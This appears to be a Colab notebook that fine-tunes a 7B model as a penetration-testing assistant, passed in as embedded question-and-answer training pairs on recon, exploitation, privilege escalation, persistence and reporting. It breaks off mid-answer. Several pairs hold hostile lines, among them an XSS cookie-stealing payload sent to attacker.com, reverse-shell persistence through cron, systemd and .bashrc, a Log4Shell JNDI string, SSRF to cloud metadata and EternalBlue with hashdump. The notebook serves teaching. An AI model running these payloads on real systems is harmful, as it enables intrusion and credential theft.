# 🔐 CyberViser — Hancock AI Agent
## Phase 1: Pentest Specialist Fine-Tuning
**Base model:** Mistral 7B Instruct v0.3 + LoRA via unsloth  
**GPU:** T4 (free Colab) → ~60-90 min  

> ⚡ Runtime → Change runtime type → **T4 GPU** before running!


In [ ]:
# CELL 1: Check GPU + install dependencies
import subprocess
r = subprocess.run(['nvidia-smi','--query-gpu=name,memory.total','--format=csv,noheader'], capture_output=True, text=True)
print('GPU:', r.stdout.strip() or '❌ No GPU — switch Runtime to GPU!')
import os
os.environ['TOKENIZERS_PARALLELISM'] = 'false'
!pip install 'unsloth[colab-new] @ git+https://github.com/unslothai/unsloth.git' -q
!pip install trl transformers accelerate datasets requests tqdm -q
print('✅ Dependencies ready')


## Step 1: Build Training Dataset

In [ ]:
# CELL 2: Pentest knowledge base (embedded)
import json

HANCOCK_SYSTEM = (
    'You are Hancock, an expert penetration tester and security researcher built by CyberViser. '
    'You operate strictly within authorized scope and legal boundaries on systems you have explicit '
    'written permission to test. You help security professionals understand attack techniques, '
    'identify vulnerabilities, and perform authorized penetration tests. You always recommend '
    'responsible disclosure and remediation.'
)

KB_PAIRS = [
  {
    "category": "recon",
    "user": "What is the difference between passive and active reconnaissance?",
    "assistant": "**Passive recon** gathers information without directly interacting with the target. You use publicly available sources: WHOIS, DNS records, Google dorking, LinkedIn, Shodan, Censys, BuiltWith, and archive.org. No packets reach the target, so there's zero detection risk.\n\n**Active recon** involves direct interaction with the target — port scanning, banner grabbing, web crawling. This leaves traces in logs and may trigger IDS/IPS alerts.\n\n**Best practice:** Always complete passive recon before going active. You'll narrow your target surface and reduce noise."
  },
  {
    "category": "recon",
    "user": "How do I perform subdomain enumeration on an authorized target?",
    "assistant": "Subdomain enumeration expands your attack surface. Use multiple approaches:\n\n**1. DNS brute-force (active):**\n```bash\namass enum -active -d target.com -o subdomains.txt\ngobuster dns -d target.com -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt\nsubfinder -d target.com -o subfinder_out.txt\n```\n\n**2. Certificate transparency logs (passive):**\n```bash\ncurl -s 'https://crt.sh/?q=%.target.com&output=json' | jq '.[].name_value' | sort -u\n```\n\n**3. DNS zone transfer (if misconfigured):**\n```bash\ndig axfr @ns1.target.com target.com\n```\n\n**4. Google dorking:**\n`site:target.com -www` in Google search.\n\nConsolidate results, remove duplicates, then resolve each subdomain to identify live hosts."
  },
  {
    "category": "recon",
    "user": "Explain how to use nmap for host discovery and service enumeration.",
    "assistant": "**Phase 1 — Host discovery (ping sweep):**\n```bash\nnmap -sn 192.168.1.0/24 -oG hosts_up.txt\n```\n(`-sn` = no port scan, just ICMP/ARP ping)\n\n**Phase 2 — Fast port scan:**\n```bash\nnmap -T4 -F --open 192.168.1.100 -oN fast_scan.txt\n```\n\n**Phase 3 — Full port + service/version scan:**\n```bash\nnmap -sV -sC -p- -T4 192.168.1.100 -oA full_scan\n```\nFlags: `-sV` = version detection, `-sC` = default scripts, `-p-` = all 65535 ports\n\n**Phase 4 — OS detection:**\n```bash\nnmap -O 192.168.1.100\n```\n\n**Phase 5 — NSE vuln scripts:**\n```bash\nnmap --script vuln 192.168.1.100\n```\n\n**Output formats:** `-oN` (normal), `-oX` (XML for import), `-oG` (greppable), `-oA` (all three).\n\nAlways save output — you'll reference it throughout the engagement."
  },
  {
    "category": "recon",
    "user": "How do I use theHarvester for OSINT gathering?",
    "assistant": "theHarvester aggregates email addresses, subdomains, IPs, and URLs from public sources.\n\n```bash\n# Search multiple sources\ntheHarvester -d target.com -b google,bing,linkedin,hunter,shodan -l 500 -f results.html\n```\n\nKey flags:\n- `-d` : target domain\n- `-b` : data sources (use `all` for everything)\n- `-l` : result limit per source\n- `-f` : output file (HTML or XML)\n\nUseful sources: `google`, `bing`, `linkedin`, `twitter`, `shodan`, `censys`, `hunter`, `dnsdumpster`\n\n**What to look for:**\n- Email patterns (e.g., firstname.lastname@target.com) → useful for password spraying\n- Employee names → LinkedIn pivot for phishing simulation\n- Subdomains → expand attack surface\n- IP ranges → scope for scanning"
  },
  {
    "category": "recon",
    "user": "What Google dorks are useful for finding exposed admin panels and sensitive files?",
    "assistant": "Google dorks use advanced search operators to find exposed assets. Examples:\n\n**Admin panels:**\n```\nsite:target.com inurl:admin\nsite:target.com inurl:login intitle:admin\nsite:target.com inurl:/wp-admin\n```\n\n**Exposed files:**\n```\nsite:target.com ext:pdf 'confidential'\nsite:target.com ext:sql\nsite:target.com filetype:env\nsite:target.com filetype:log\n```\n\n**Config/credential leaks:**\n```\nsite:target.com inurl:config\nsite:target.com intitle:'index of' '.git'\nsite:target.com ext:bak OR ext:old\n```\n\n**Error messages (leak stack traces/versions):**\n```\nsite:target.com 'SQL syntax'\nsite:target.com 'Warning: mysql_fetch'\n```\n\nReference: https://www.exploit-db.com/google-hacking-database — GHDB has 7000+ dorks.\n\nAlways document findings and only access what's in scope."
  },
  {
    "category": "scanning",
    "user": "How do I perform web application scanning with Nikto?",
    "assistant": "Nikto is a web server scanner that checks for dangerous files, outdated software, and misconfigs.\n\n**Basic scan:**\n```bash\nnikto -h https://target.com -o nikto_report.html -Format html\n```\n\n**With authentication:**\n```bash\nnikto -h https://target.com -id admin:password\n```\n\n**Scan specific port:**\n```bash\nnikto -h 192.168.1.100 -p 8443 -ssl\n```\n\n**Via proxy (route through Burp for manual review):**\n```bash\nnikto -h https://target.com -useproxy http://127.0.0.1:8080\n```\n\n**What Nikto finds:**\n- Default credentials on admin panels\n- Dangerous HTTP methods (PUT, DELETE)\n- Outdated server software versions\n- Missing security headers (X-Frame-Options, CSP, HSTS)\n- Exposed backup files, source code, config files\n\nNikto generates false positives — verify each finding manually."
  },
  {
    "category": "scanning",
    "user": "How do I use dirb or gobuster to discover hidden directories and files?",
    "assistant": "Directory brute-forcing finds unlinked endpoints on web servers.\n\n**gobuster (faster, recommended):**\n```bash\n# Directory mode\ngobuster dir -u https://target.com -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt \\\n  -x php,html,txt,bak -t 50 -o gobuster_results.txt\n\n# DNS subdomain mode\ngobuster dns -d target.com -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt\n\n# Virtual host mode\ngobuster vhost -u https://target.com -w subdomains.txt\n```\n\n**feroxbuster (recursive, excellent for deep enumeration):**\n```bash\nferoxbuster -u https://target.com -w /usr/share/wordlists/SecLists/Discovery/Web-Content/raft-medium-directories.txt \\\n  --depth 3 -x php,asp,aspx -o ferox_results.txt\n```\n\n**Key wordlists (SecLists):**\n- `Discovery/Web-Content/common.txt` — quick initial scan\n- `Discovery/Web-Content/directory-list-2.3-medium.txt` — comprehensive\n- `Discovery/Web-Content/raft-large-files.txt` — file discovery\n\nInteresting status codes: 200 (found), 301/302 (redirect), 403 (forbidden — probe further), 500 (server error)."
  },
  {
    "category": "scanning",
    "user": "What is CVSS and how do I use it to prioritize vulnerabilities?",
    "assistant": "CVSS (Common Vulnerability Scoring System) is the industry standard for rating vulnerability severity (0.0–10.0).\n\n**CVSS v3.1 Base Score breakdown:**\n\n| Metric | Options | Impact on Score |\n|--------|---------|----------------|\n| Attack Vector | Network / Adjacent / Local / Physical | Network = highest risk |\n| Attack Complexity | Low / High | Low = easier to exploit |\n| Privileges Required | None / Low / High | None = highest risk |\n| User Interaction | None / Required | None = higher risk |\n| Scope | Unchanged / Changed | Changed = affects other components |\n| Confidentiality Impact | None / Low / High | — |\n| Integrity Impact | None / Low / High | — |\n| Availability Impact | None / Low / High | — |\n\n**Score ranges:**\n- 9.0–10.0 = Critical\n- 7.0–8.9 = High\n- 4.0–6.9 = Medium\n- 0.1–3.9 = Low\n\n**Prioritization in a pentest report:**\n1. Critical RCE, auth bypass = fix immediately\n2. High SQLi, privilege escalation = fix within 1 week\n3. Medium info disclosure = fix within 30 days\n4. Low missing headers = fix in next sprint\n\nUse https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator to compute scores."
  },
  {
    "category": "exploitation_web",
    "user": "Explain SQL injection and how to test for it manually.",
    "assistant": "SQL injection occurs when user input is concatenated into SQL queries without sanitization.\n\n**Manual detection — error-based:**\n```\nhttps://target.com/item?id=1'\nhttps://target.com/item?id=1'--\nhttps://target.com/item?id=1' OR '1'='1\n```\nIf you see a SQL error or unexpected behavior, injection may be possible.\n\n**Boolean-based blind:**\n```\nid=1 AND 1=1  → returns normal response\nid=1 AND 1=2  → returns different response\n```\n\n**UNION-based (enumerate columns):**\n```sql\nid=1 ORDER BY 1--   (increment until error → tells you column count)\nid=0 UNION SELECT NULL,NULL,NULL--\nid=0 UNION SELECT 1,database(),3--\n```\n\n**Extract data (MySQL):**\n```sql\nUNION SELECT 1,table_name,3 FROM information_schema.tables WHERE table_schema=database()--\nUNION SELECT 1,column_name,3 FROM information_schema.columns WHERE table_name='users'--\nUNION SELECT 1,concat(username,':',password),3 FROM users--\n```\n\n**Remediation:** Use parameterized queries / prepared statements. Never concatenate input into SQL."
  },
  {
    "category": "exploitation_web",
    "user": "How do I use sqlmap on an authorized target?",
    "assistant": "sqlmap automates SQL injection detection and exploitation.\n\n**Basic test (GET parameter):**\n```bash\nsqlmap -u 'https://target.com/item?id=1' --batch --dbs\n```\n\n**POST request:**\n```bash\nsqlmap -u 'https://target.com/login' --data='username=admin&password=test' --batch --dbs\n```\n\n**With session cookie (authenticated scan):**\n```bash\nsqlmap -u 'https://target.com/profile?id=1' --cookie='session=abc123' --batch --dbs\n```\n\n**Dump a specific table:**\n```bash\nsqlmap -u 'https://target.com/item?id=1' -D target_db -T users --dump --batch\n```\n\n**Via Burp Suite request file:**\n```bash\n# Save request from Burp as req.txt\nsqlmap -r req.txt --batch --level=3 --risk=2\n```\n\n**Key flags:**\n- `--level` (1-5): test depth — start at 1, increase if needed\n- `--risk` (1-3): payload risk level — keep at 1-2 for production\n- `--technique=BEUSTQ`: specify injection types\n- `--tamper`: bypass WAFs (e.g., `--tamper=space2comment`)\n\nAlways run with `--batch` for non-interactive mode and log output with `--output-dir`."
  },
  {
    "category": "exploitation_web",
    "user": "What is Cross-Site Scripting (XSS) and how do I test for it?",
    "assistant": "XSS allows attackers to inject malicious scripts into pages viewed by other users.\n\n**Types:**\n- **Reflected:** Payload in URL, executes in victim's browser when they click the link\n- **Stored:** Payload saved in DB, executes for every user who loads that page\n- **DOM-based:** Payload processed by client-side JavaScript\n\n**Basic test payloads:**\n```html\n<script>alert(1)</script>\n\"><script>alert(1)</script>\n'><img src=x onerror=alert(1)>\n{{7*7}}  (test for SSTI too)\njavascript:alert(1)\n```\n\n**Testing with Burp Suite:**\n1. Intercept every input field (search, forms, URL params, headers)\n2. Use Burp's Intruder with XSS wordlists from SecLists\n3. Check DOM in browser DevTools for reflection\n\n**Impact escalation (proof of concept):**\n```html\n<script>document.location='https://attacker.com/steal?c='+document.cookie</script>\n```\n\n**Remediation:** Output encode all user data (HTML entity encoding). Use CSP headers. Never put user input directly into innerHTML or eval()."
  },
  {
    "category": "exploitation_web",
    "user": "How do I test for authentication and authorization flaws?",
    "assistant": "**Authentication testing:**\n\n1. **Default credentials:** Try admin/admin, admin/password, root/root on login panels\n2. **Brute force (authorized):**\n   ```bash\n   hydra -l admin -P /usr/share/wordlists/rockyou.txt target.com http-post-form '/login:username=^USER^&password=^PASS^:Invalid credentials'\n   ```\n3. **Username enumeration:** Compare response time/content for valid vs invalid usernames\n4. **Password reset flaws:** Test predictable tokens, token reuse, host header injection\n5. **JWT weaknesses:** Decode with jwt.io, check for `alg:none`, weak secrets, missing validation\n\n**Authorization testing (IDOR / Broken Access Control):**\n\n1. **IDOR:** Change numeric IDs in requests\n   ```\n   GET /api/user/1234/profile → change to /api/user/1235/profile\n   ```\n2. **Horizontal privilege escalation:** User A accessing User B's data\n3. **Vertical privilege escalation:** Normal user accessing admin functions\n4. **Forced browsing:** Directly access `/admin`, `/dashboard`, `/internal` without authorization\n5. **Mass assignment:** Send extra fields in JSON body to modify privileged attributes\n\nDocument every authorization bypass with the exact request/response as proof of concept."
  },
  {
    "category": "exploitation_web",
    "user": "How do I test for Server-Side Request Forgery (SSRF)?",
    "assistant": "SSRF lets you make the server send requests to internal or external systems.\n\n**Where to look:**\n- URL parameters: `?url=`, `?redirect=`, `?fetch=`, `?webhook=`, `?src=`\n- File upload features with URL-based imports\n- PDF generators, image processors, webhook URLs\n\n**Basic test:**\n```\nPOST /fetch\nbody: {\"url\": \"http://your-collaborator.burpcollaborator.net\"}\n```\nUse Burp Collaborator or interactsh to detect out-of-band callbacks.\n\n**Probe internal services:**\n```\nhttp://127.0.0.1:22       → SSH\nhttp://127.0.0.1:6379     → Redis\nhttp://169.254.169.254/   → AWS metadata (critical!)\nhttp://10.0.0.1:8080      → internal services\n```\n\n**AWS metadata endpoint (SSRF = credential theft):**\n```\nhttp://169.254.169.254/latest/meta-data/iam/security-credentials/\n```\n\n**Bypasses for filters:**\n- `http://2130706433/` (decimal IP for 127.0.0.1)\n- `http://127.0.0.1.nip.io/`\n- `http://[::1]/` (IPv6 localhost)\n\n**Remediation:** Allowlist outbound URLs, block internal IP ranges, use a proxy layer."
  },
  {
    "category": "exploitation_network",
    "user": "How do I use Metasploit to exploit a vulnerability on an authorized target?",
    "assistant": "Metasploit Framework (MSF) is the industry standard exploitation framework.\n\n**Start MSF console:**\n```bash\nmsfconsole -q\n```\n\n**Workflow — example: EternalBlue (MS17-010) on authorized Windows host:**\n```bash\n# 1. Search for the module\nmsf6> search eternalblue\n\n# 2. Select exploit\nmsf6> use exploit/windows/smb/ms17_010_eternalblue\n\n# 3. View required options\nmsf6> show options\n\n# 4. Set target\nmsf6> set RHOSTS 192.168.1.100\nmsf6> set LHOST 192.168.1.50\n\n# 5. Select payload\nmsf6> set PAYLOAD windows/x64/meterpreter/reverse_tcp\n\n# 6. Run\nmsf6> run\n```\n\n**Once in Meterpreter:**\n```\nmeterpreter> sysinfo          # system info\nmeterpreter> getuid           # current user\nmeterpreter> getsystem        # attempt privesc\nmeterpreter> hashdump         # dump NTLM hashes\nmeterpreter> upload file.exe  # upload file\nmeterpreter> shell            # drop to shell\n```\n\n**Best practices:**\n- Always `set VERBOSE true` and log sessions\n- Use `check` command before exploiting when available\n- Document every action with timestamps for the report"
  },
  {
    "category": "exploitation_network",
    "user": "How do I perform a man-in-the-middle attack for testing on an authorized internal network?",
    "assistant": "MITM testing validates whether the network is vulnerable to ARP poisoning and credential interception.\n\n**ARP poisoning with arpspoof (requires authorized access to LAN):**\n```bash\n# Enable IP forwarding\necho 1 > /proc/sys/net/ipv4/ip_forward\n\n# Poison ARP cache (in separate terminals)\narpspoof -i eth0 -t 192.168.1.100 192.168.1.1   # tell victim gateway is us\narpspoof -i eth0 -t 192.168.1.1 192.168.1.100   # tell gateway victim is us\n```\n\n**Capture traffic with Bettercap (modern, comprehensive):**\n```bash\nsudo bettercap -iface eth0\nbettercap> net.probe on\nbettercap> net.recon on\nbettercap> arp.spoof.targets 192.168.1.100\nbettercap> arp.spoof on\nbettercap> net.sniff on\n```\n\n**SSL stripping (test HSTS compliance):**\n```bash\nbettercap> https.proxy on\n```\n\n**What to look for:**\n- Cleartext HTTP credentials\n- NTLM authentication hashes → crack with hashcat\n- Unencrypted protocols: FTP, Telnet, SMTP\n\n**Remediation:** Enforce HTTPS/HSTS, use 802.1X network authentication, enable Dynamic ARP Inspection on switches."
  },
  {
    "category": "post_exploitation",
    "user": "What are common Linux privilege escalation techniques?",
    "assistant": "After gaining initial access, escalating to root is often the goal. Systematic enumeration is key.\n\n**Automated enumeration (run first):**\n```bash\n# LinPEAS — comprehensive Linux privesc scanner\ncurl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh\n\n# LinEnum\nwget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh && chmod +x LinEnum.sh && ./LinEnum.sh\n```\n\n**Manual checks:**\n\n1. **SUID/SGID binaries:**\n   ```bash\n   find / -perm -4000 -type f 2>/dev/null\n   # Check GTFOBins: https://gtfobins.github.io/\n   ```\n\n2. **Sudo permissions:**\n   ```bash\n   sudo -l\n   # If (ALL) NOPASSWD: /usr/bin/vim → sudo vim -c ':!/bin/bash'\n   ```\n\n3. **Cron jobs (writable scripts):**\n   ```bash\n   cat /etc/crontab\n   ls -la /etc/cron*\n   # Find writable scripts run by root\n   ```\n\n4. **Kernel exploits:**\n   ```bash\n   uname -a\n   # Search searchsploit or ExploitDB for kernel version\n   ```\n\n5. **Readable /etc/shadow or SSH keys:**\n   ```bash\n   cat /etc/shadow\n   find / -name 'id_rsa' 2>/dev/null\n   ```\n\n6. **NFS no_root_squash:**\n   ```bash\n   cat /etc/exports  # look for no_root_squash\n   ```\n\nReference: https://book.hacktricks.xyz/linux-hardening/privilege-escalation"
  },
  {
    "category": "post_exploitation",
    "user": "What are common Windows privilege escalation techniques?",
    "assistant": "**Automated enumeration:**\n```powershell\n# WinPEAS\n.\\winPEASx64.exe\n\n# PowerUp (PowerShell)\nImport-Module .\\PowerUp.ps1; Invoke-AllChecks\n\n# Seatbelt\n.\\Seatbelt.exe -group=all\n```\n\n**Manual checks:**\n\n1. **Unquoted service paths:**\n   ```cmd\n   wmic service get name,displayname,pathname,startmode | findstr /i 'auto' | findstr /i /v 'c:\\windows'\n   ```\n\n2. **Weak service permissions:**\n   ```cmd\n   accesschk.exe -uwcqv 'Authenticated Users' *\n   sc config vuln_service binpath= 'C:\\temp\\evil.exe'\n   ```\n\n3. **AlwaysInstallElevated (MSI as SYSTEM):**\n   ```cmd\n   reg query HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer /v AlwaysInstallElevated\n   ```\n\n4. **Token impersonation (SeImpersonatePrivilege):**\n   ```\n   whoami /priv  # look for SeImpersonatePrivilege\n   # Use PrintSpoofer or GodPotato\n   PrintSpoofer.exe -i -c powershell\n   ```\n\n5. **Stored credentials:**\n   ```cmd\n   cmdkey /list\n   dir /s /b pass.txt credentials.txt *.config 2>nul\n   findstr /si password *.txt *.xml *.ini\n   ```\n\n6. **Pass-the-Hash (with captured NTLM hash):**\n   ```bash\n   evil-winrm -i 192.168.1.100 -u administrator -H 'aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0'\n   ```"
  },
  {
    "category": "post_exploitation",
    "user": "How do I establish persistence on a compromised Linux system during an authorized red team?",
    "assistant": "Persistence mechanisms allow re-entry if the initial access is lost. Document every change for cleanup.\n\n**1. SSH authorized keys:**\n```bash\nmkdir -p ~/.ssh && chmod 700 ~/.ssh\necho 'ssh-rsa AAAA...your_public_key...' >> ~/.ssh/authorized_keys\nchmod 600 ~/.ssh/authorized_keys\n```\n\n**2. Cron job backdoor:**\n```bash\n(crontab -l 2>/dev/null; echo '*/5 * * * * /bin/bash -c \"bash -i >& /dev/tcp/attacker_ip/4444 0>&1\"') | crontab -\n```\n\n**3. Systemd service (if root):**\n```bash\ncat > /etc/systemd/system/backdoor.service << EOF\n[Unit]\nDescription=System Health Monitor\n[Service]\nExecStart=/bin/bash -c 'bash -i >& /dev/tcp/attacker_ip/4444 0>&1'\nRestart=always\n[Install]\nWantedBy=multi-user.target\nEOF\nsystemctl enable backdoor.service\n```\n\n**4. .bashrc / .profile hook:**\n```bash\necho 'nohup bash -c \"bash -i >& /dev/tcp/attacker_ip/4444 0>&1\" &' >> ~/.bashrc\n```\n\n**5. SUID shell:**\n```bash\ncp /bin/bash /tmp/.hidden_shell && chmod +s /tmp/.hidden_shell\n# Execute: /tmp/.hidden_shell -p\n```\n\n**CRITICAL:** Log every persistence mechanism with timestamp, location, and method. Provide cleanup steps in your report. Remove all backdoors at engagement end."
  },
  {
    "category": "post_exploitation",
    "user": "How do I perform lateral movement in an authorized internal network pentest?",
    "assistant": "Lateral movement demonstrates the blast radius if an attacker gains initial access.\n\n**Credential reuse (most common):**\n```bash\n# CME (CrackMapExec) — spray credentials across subnet\ncrackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123!'\ncrackmapexec winrm 192.168.1.0/24 -u admin -p 'Password123!'\n```\n\n**Pass-the-Hash (with NTLM hash from hashdump):**\n```bash\ncrackmapexec smb 192.168.1.0/24 -u administrator -H 'ntlm_hash_here'\nevil-winrm -i 192.168.1.101 -u administrator -H 'ntlm_hash'\n```\n\n**PsExec-style remote execution:**\n```bash\nimpacket-psexec administrator:Password123!@192.168.1.101\nimpacket-wmiexec administrator:Password123!@192.168.1.101\n```\n\n**SSH lateral movement:**\n```bash\n# Find SSH keys on compromised host\nfind / -name 'id_rsa' 2>/dev/null\nssh -i /home/user/.ssh/id_rsa user@192.168.1.102\n```\n\n**Pivoting through compromised host:**\n```bash\n# SSH tunnel — access 192.168.2.0/24 through pivot\nssh -D 9050 user@pivot_host  # SOCKS proxy\nproxychains nmap -sT 192.168.2.0/24\n```\n\nDocument every system accessed, user context, and method. Map the network as you go."
  },
  {
    "category": "reporting",
    "user": "How do I write a professional penetration test finding?",
    "assistant": "Every finding needs six components:\n\n**1. Title** — Short, clear, searchable\n> SQL Injection in /api/products Endpoint Allows Database Extraction\n\n**2. Severity** — CVSS v3.1 score + qualitative rating\n> CVSS: 9.8 (Critical) | AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n\n**3. Description** — What the vulnerability is and where it exists\n> The `id` parameter in the `/api/products` GET endpoint is vulnerable to UNION-based SQL injection. An unauthenticated attacker can enumerate the database schema and extract all table data.\n\n**4. Proof of Concept** — Exact steps to reproduce (screenshots + raw requests)\n> ```\n> GET /api/products?id=1 UNION SELECT 1,table_name,3 FROM information_schema.tables--\n> ```\n> Response: `{\"name\": \"users\", ...}`\n\n**5. Impact** — Business impact in plain English\n> An attacker can extract all customer PII, password hashes, and payment data, resulting in regulatory violations (GDPR, PCI DSS) and reputational damage.\n\n**6. Remediation** — Specific, actionable fix\n> Use parameterized queries (prepared statements) for all database interactions. Example:\n> ```python\n> cursor.execute('SELECT * FROM products WHERE id = %s', (product_id,))\n> ```\n> Additionally, implement least-privilege database accounts and enable WAF rules."
  },
  {
    "category": "reporting",
    "user": "What should a penetration test executive summary include?",
    "assistant": "The executive summary is for stakeholders who won't read the technical details. Keep it to 1-2 pages.\n\n**Structure:**\n\n**1. Engagement Overview**\n- Scope: what was tested (IP ranges, domains, applications)\n- Dates: testing window\n- Testing type: black box / grey box / white box\n- Tester(s): your team/company\n\n**2. Overall Risk Rating**\n- Single rating: Critical / High / Medium / Low / Informational\n- Brief justification in 2-3 sentences\n\n**3. Key Findings Summary**\n- Table: Count of findings by severity\n- Top 3 most critical findings in plain English\n\n**4. Attack Narrative (optional but powerful)**\n- Story of how an attacker could chain vulnerabilities to achieve full compromise\n- Example: 'Starting from the public-facing login page, we exploited SQL injection to extract admin credentials, then used those to access the internal admin panel, from which we pivoted to the database server.'\n\n**5. Immediate Recommendations**\n- Top 3 priorities the business should address this week\n\n**6. Positive Observations**\n- What the organization is doing well (builds goodwill, balances the report)"
  },
  {
    "category": "tools",
    "user": "What is Burp Suite and how do I use it for web application testing?",
    "assistant": "Burp Suite is the essential web application security testing platform.\n\n**Setup:**\n1. Set browser proxy to `127.0.0.1:8080`\n2. Install Burp's CA certificate in browser (Proxy → Options → Import/Export CA)\n3. Browse target — all traffic appears in Proxy → HTTP History\n\n**Core features:**\n\n**Proxy:** Intercept and modify requests/responses in real-time\n\n**Repeater:** Resend and modify individual requests\n```\nCtrl+R → send request to Repeater\nModify parameter → Send → observe response\n```\n\n**Intruder:** Automated fuzzing and brute force\n- Attack types: Sniper (one param), Battering Ram (same payload all params), Pitchfork (parallel), Cluster Bomb (all combos)\n- Load SecLists wordlists for payloads\n\n**Scanner (Pro):** Automated vulnerability scanning\n- Right-click request → 'Scan' → active/passive scan\n\n**Decoder:** Encode/decode Base64, URL, HTML, hex\n\n**Comparer:** Diff two responses side-by-side\n\n**Extensions (BApp Store):** Add AuthMatrix, Param Miner, ActiveScan++, Hackvertor\n\n**Pro tip:** Always enable 'Logging' and export your project file at end of engagement."
  },
  {
    "category": "tools",
    "user": "What Kali Linux tools are essential for a pentester and what does each do?",
    "assistant": "**Recon:**\n| Tool | Purpose |\n|------|--------|\n| nmap | Port scanning, service/OS detection, NSE scripts |\n| amass | Subdomain enumeration, ASN/IP mapping |\n| subfinder | Fast passive subdomain discovery |\n| theHarvester | OSINT: emails, subdomains, IPs from search engines |\n| shodan CLI | Search internet-connected devices |\n| recon-ng | Full-featured OSINT framework |\n\n**Web:**\n| Tool | Purpose |\n|------|--------|\n| Burp Suite | Full web app testing proxy/scanner |\n| gobuster/feroxbuster | Directory/file brute-forcing |\n| nikto | Web server vulnerability scanner |\n| sqlmap | Automated SQL injection |\n| wfuzz | Web fuzzer for params, headers, auth |\n| nuclei | Template-based vulnerability scanner |\n\n**Exploitation:**\n| Tool | Purpose |\n|------|--------|\n| Metasploit | Exploit framework, payload delivery |\n| searchsploit | Search ExploitDB offline |\n| crackmapexec | SMB/WinRM/LDAP network pentesting |\n| impacket | Windows protocol interaction (PsExec, WMI) |\n\n**Post-Exploitation:**\n| Tool | Purpose |\n|------|--------|\n| LinPEAS/WinPEAS | Automated privilege escalation enumeration |\n| mimikatz | Windows credential extraction |\n| evil-winrm | WinRM shell with pass-the-hash |\n| hashcat/john | Password cracking |\n| proxychains | Route tools through pivot host |"
  },
  {
    "category": "vuln_analysis",
    "user": "How do I analyze a CVE to determine if a target is vulnerable?",
    "assistant": "**Step 1 — Understand the CVE:**\n- NVD entry: https://nvd.nist.gov/vuln/detail/CVE-YYYY-NNNNN\n- Read: affected versions, CVSS vector, CWE type, references\n- Check vendor advisory for official patch info\n\n**Step 2 — Identify affected software on target:**\n```bash\n# From nmap scan\nnmap -sV 192.168.1.100  # check service versions\n\n# Banner grabbing\nnc 192.168.1.100 80 && echo 'HEAD / HTTP/1.0\\n\\n'\n\n# Check package version (on compromised Linux host)\ndpkg -l | grep apache\nrpm -qa | grep nginx\n```\n\n**Step 3 — Find PoC / exploit:**\n```bash\nsearchsploit 'Apache 2.4.49'  # ExploitDB local search\n# Check: https://www.exploit-db.com\n# Check: https://github.com search for CVE number\n# Check: Metasploit: search cve:2021-41773\n```\n\n**Step 4 — Validate in test environment first**\nAlways replicate the exploit in a lab before running on authorized production target.\n\n**Step 5 — Document:**\n- CVE ID, CVSS score, affected version confirmed, exploit method, impact\n- Screenshot of version detection + successful PoC"
  },
  {
    "category": "vuln_analysis",
    "user": "What is Log4Shell (CVE-2021-44228) and how was it exploited?",
    "assistant": "Log4Shell is a critical RCE vulnerability (CVSS 10.0) in Apache Log4j 2 (versions 2.0-beta9 to 2.14.1).\n\n**Root cause:** Log4j's message lookup feature processes JNDI URIs in log messages. If user-controlled input is logged, an attacker can inject a lookup string that causes the server to fetch and execute a remote Java class.\n\n**Attack flow:**\n```\n1. Attacker sends: ${jndi:ldap://attacker.com:1389/exploit}\n   (in User-Agent, X-Forwarded-For, login fields — anywhere that gets logged)\n\n2. Vulnerable Log4j processes the lookup, connects to attacker's LDAP server\n\n3. LDAP server responds with reference to malicious Java class\n\n4. JVM loads and executes the class → RCE as the application's service account\n```\n\n**Detection in logs:**\n```\ngrep -r '\\${jndi' /var/log/\ngrep -r 'ldap://' /var/log/\n```\n\n**Testing (authorized):**\n```bash\ncurl -H 'X-Api-Version: ${jndi:ldap://your-collaborator.net/a}' https://target.com/\n```\nUse Burp Collaborator or interactsh to detect DNS/HTTP callbacks.\n\n**Remediation:** Upgrade to Log4j 2.17.1+. Short-term mitigations: set `log4j2.formatMsgNoLookups=true`, remove JndiLookup class from classpath."
  },
  {
    "category": "methodology",
    "user": "What is the PTES (Penetration Testing Execution Standard) methodology?",
    "assistant": "PTES provides a comprehensive methodology for professional penetration tests.\n\n**7 Phases:**\n\n**1. Pre-engagement Interactions**\n- Define scope (IP ranges, domains, excluded systems)\n- Get signed Rules of Engagement (ROE) / Statement of Work\n- Define emergency contacts, testing windows, communication channels\n- Agree on deliverables (report format, debriefs)\n\n**2. Intelligence Gathering (Recon)**\n- OSINT: WHOIS, DNS, social media, job postings\n- Technical: subdomain enum, port scanning, tech stack fingerprinting\n\n**3. Threat Modeling**\n- Identify high-value assets, likely threat actors, attack vectors\n- Prioritize testing focus\n\n**4. Vulnerability Analysis**\n- Automated scanning (Nessus, Nuclei, Nikto)\n- Manual testing, CVE analysis\n- Correlate findings with threat model\n\n**5. Exploitation**\n- Attempt to confirm vulnerabilities with PoC\n- Controlled, documented, minimizing impact\n\n**6. Post-Exploitation**\n- Demonstrate impact: data access, lateral movement, persistence\n- Show attack chains\n\n**7. Reporting**\n- Executive summary + technical findings + remediation recommendations\n- Debrief with client\n- Remediation verification (retest)\n\nReference: http://www.pentest-standard.org/"
  },
  {
    "category": "methodology",
    "user": "What should I include in my Rules of Engagement before starting a pentest?",
    "assistant": "Rules of Engagement (ROE) are the legal and operational foundation of every pentest. Never start without them.\n\n**Essential ROE elements:**\n\n**1. Scope Definition**\n- In-scope: specific IP ranges, domain names, applications, environments\n- Out-of-scope: explicitly excluded systems, third-party infrastructure\n- Example: `In scope: 10.0.1.0/24, api.target.com. Out of scope: payment.target.com (third-party processor)`\n\n**2. Testing Window**\n- Allowed dates and times (e.g., Mon–Fri 09:00–17:00 EST, or 24/7)\n- Business justification for off-hours testing if needed\n\n**3. Authorized Techniques**\n- Specify: DoS testing allowed? Social engineering? Physical access?\n- Specify: Can you destroy data? Modify configurations?\n\n**4. Emergency Stop Procedure**\n- Named contact at client with phone number\n- Condition that triggers immediate stop (production impact, real incident)\n\n**5. Communication Protocol**\n- How to report critical findings immediately (e.g., call CISO within 1 hour of finding RCE)\n\n**6. Legal Authorization**\n- Signed by authorized representative (e.g., CISO, CTO)\n- Include authorization 